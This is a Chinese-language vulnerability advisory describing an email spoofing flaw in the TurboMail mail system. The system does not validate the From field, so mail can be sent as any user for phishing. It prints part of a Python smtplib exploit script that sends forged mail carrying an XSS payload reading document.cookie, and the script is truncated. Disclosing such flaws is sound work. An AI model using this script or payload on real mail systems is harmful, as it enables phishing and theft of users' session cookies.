TurboMail邮件系统伪造邮件漏洞,可实施邮件钓鱼

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: TurboMail邮件系统存在邮件伪造漏洞,可实施邮件钓鱼攻击.. ### 详细说明: TurboMail邮件系统在发送邮件时没有对邮件协议的From字段进行有效验证,发件人可以伪造任意用户进行发送邮件,达到邮件欺骗攻击的目的,可以用来进行邮件钓鱼等。 TurboMail邮件系统下载链接:http://www.turbomail.org/download.html 测试环境:Win2003 + turbomail_win_520.exe ### 漏洞证明: 本地安装Windows版本的TurboMail邮件系统 1)使用邮件系统管理用户添加2个测试账号test1@test.com和test2@test.com [<img src="https://images.seebug.org/upload/201410/01003342a8660fcff9918ad88c3eee2c7420d2a2.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/01003342a8660fcff9918ad88c3eee2c7420d2a2.png) 2)漏洞利用代码 这里直接贴上利用脚本: ``` 这里直接贴上利用脚本: #!/user/bin/python import smtplib import datetime MailTemplate = '''From: {From}\nTo: {To}\nSubject: {Subject}\nDate: {Date}\nContent-type: {ContentType}\n\n{Msg}\r\n\r\n''' payload = """<img/src/onerror=alert(document.cookie)>""" def SendTurboMail(Server,Username,Password,Sender,Reciever,MailMsg): try: SmtpObj = smtplib.SMTP(Server) SmtpObj.login(Username, Password) print 'Sending Email'...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息